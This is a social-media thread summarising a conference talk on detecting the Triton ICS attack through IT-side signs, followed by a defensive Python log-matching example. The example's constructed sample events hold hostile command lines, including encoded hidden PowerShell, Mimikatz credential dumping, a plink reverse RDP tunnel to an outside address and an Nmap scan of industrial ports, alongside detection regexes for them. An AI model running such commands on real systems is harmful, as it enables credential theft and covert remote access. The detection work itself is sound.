This was a fav session from #S4x19. I think @stvemillertime made several GREAT points about why IT Security techniques are important when defending OT environments. 1/n
9:48-10:22: If you want to detect an ICS attack as far left of boom as possible, you should look for the IT attack first. (Looking for the OT attack is dangerously late-stage.) 2/n
8:30-9:26: In the Triton attack, 99 compromised machines were Windows servers or workstations. Only 1 was the safety controller... 99% of detection opportunities are conventional detection opportunities. 3/n
5:42-8:04: The vast majority of the Triton attack used conventional (IT) tools like Nmap, PowerShell-invoked Mimikatz, & Meterpreter, webshells, VPN compromise, cryptcat, plink-tunneled RDP, scheduled tasks for persistence, AD Explorer & other Sysinternals. 4/n
Are OT-specific tools and experience valuable? Absolutely. Shout out to @electricfork and the absolute brain trust that @RobertMLee has built at @DragosInc. 5/n
What I am saying is that OT networks are not so unique that IT tools are useless. Purdue model alone won’t save you. And I talk to a LOT of OT network owners that are woefully ignoring or underusing classes of good tools because they have blind faith in their segmentation. 6/6
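The thread's point is that most of the detection opportunities in an attack like Triton are conventional Windows-side ones (encoded PowerShell, Mimikatz invocation, scheduled-task persistence, plink tunnels, Nmap scans) long before anything touches a controller. The following is an added example, not code from the thread or its author, showing what "looking for the IT attack first" looks like as a handful of log-matching rules run over a constructed set of Sysmon and Security event lines. Host names, event text and the tab-separated `host<TAB>source<TAB>message` layout are all assumptions for the example; the regexes are generic signatures for the tool classes the thread names, not a complete ruleset.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample events for the example (not from any real incident).
# Layout assumed here: host <TAB> log source <TAB> free-text message.
SAMPLE_EVENTS = """\
eng-ws01\tSysmon:1\tImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe CommandLine=powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA
eng-ws01\tSysmon:1\tImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe CommandLine=powershell.exe -ExecutionPolicy Bypass Invoke-Mimikatz -DumpCreds
hist-srv02\tSecurity:4698\tA scheduled task was created. TaskName=\\Updater Author=CORP\\svc_ops
jump01\tSysmon:1\tImage=C:\\Users\\Public\\plink.exe CommandLine=plink.exe -N -R 3389:127.0.0.1:3389 user@203.0.113.10
eng-ws03\tSysmon:1\tImage=C:\\Tools\\nmap.exe CommandLine=nmap.exe -sS -p 502,44818 10.10.20.0/24
hist-srv02\tSysmon:1\tImage=C:\\Windows\\System32\\notepad.exe CommandLine=notepad.exe C:\\temp\\notes.txt
"""

# Signatures for the conventional (IT-side) tool classes the thread lists.
# Each rule: (technique label, regex applied to the whole event line).
RULES = [
    ("powershell_encoded_command",
     re.compile(r"powershell(\.exe)?\b.*\s-(enc|encodedcommand|e)\b", re.I)),
    ("powershell_mimikatz",
     re.compile(r"powershell(\.exe)?\b.*(mimikatz|sekurlsa)", re.I)),
    ("scheduled_task_persistence",
     re.compile(r"Security:4698|schtasks(\.exe)?\s+/create", re.I)),
    ("plink_tunnel",
     re.compile(r"plink(\.exe)?\b.*\s-[RL]\s*\d+:", re.I)),
    ("nmap_scan",
     re.compile(r"\bnmap(\.exe)?\b", re.I)),
]


@dataclass
class Finding:
    host: str
    source: str
    technique: str
    message: str


def detect(log_text: str) -> List[Finding]:
    """Run every rule over every well-formed event line; one Finding per rule hit."""
    findings: List[Finding] = []
    for line in log_text.splitlines():
        parts = line.split("\t", 2)
        if len(parts) != 3:
            continue  # skip malformed lines rather than guessing at fields
        host, source, message = parts
        for technique, pattern in RULES:
            if pattern.search(line):
                findings.append(Finding(host, source, technique, message))
    return findings


def summarize(findings: List[Finding]) -> Dict[str, int]:
    """Count hits per technique; useful for seeing where the kill chain was visible."""
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f.technique] = counts.get(f.technique, 0) + 1
    return counts


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f.host:<12} {f.source:<14} {f.technique}")
    print(summarize(detect(SAMPLE_EVENTS)))
```

Every hit in the sample lands on a Windows workstation, server or jump host, none on a controller, which is the thread's argument in miniature: these are ordinary endpoint and Windows event-log detections, and they fire regardless of how the Purdue levels are segmented.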